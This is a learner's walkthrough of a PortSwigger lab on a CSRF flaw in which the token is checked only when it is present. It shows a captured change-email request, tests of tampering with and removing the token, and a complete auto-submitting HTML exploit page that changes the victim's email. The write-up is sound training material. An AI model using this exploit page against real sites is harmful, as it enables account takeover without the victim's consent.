This lab's email change functionality is vulnerable to CSRF.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You can log in to your own account using the following credentials: `wiener:peter`

# Practical
Again, login as user wiener. And let's change our email and see what happens.
```html
POST /my-account/change-email HTTP/1.1
Host: target-ac931f731ed96f588005086600dc001d.web-security-academy.net
Cookie: session=2gjO0nJPJmHdEpXYXPXVv9zjfu367RJM
Content-Length: 61
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://target-ac931f731ed96f588005086600dc001d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://target-ac931f731ed96f588005086600dc001d.web-security-academy.net/my-account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Dnt: 1
Sec-Gpc: 1
Connection: close

email=hello%40gmail.com&csrf=CxagfYTzlcNSD14dd6Ab2Uf6Ljiy7Jxa
```
Okay so we have another CRSF token, let's try to change it to a random value or replace a character
```txt
Invalid CRSF token
```
What if we remove it?
```txt
HTTP/1.1 302 Found
```
Looks like the CRSF token is only being validated if it is present, if it's not then it just doesn't care.
Let's craft our exploit. This payload is 100% the same with the first lab.
```html
<html>
  <body>
    <form action="https://target-ac931f731ed96f588005086600dc001d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
And we solved the lab and change the email!
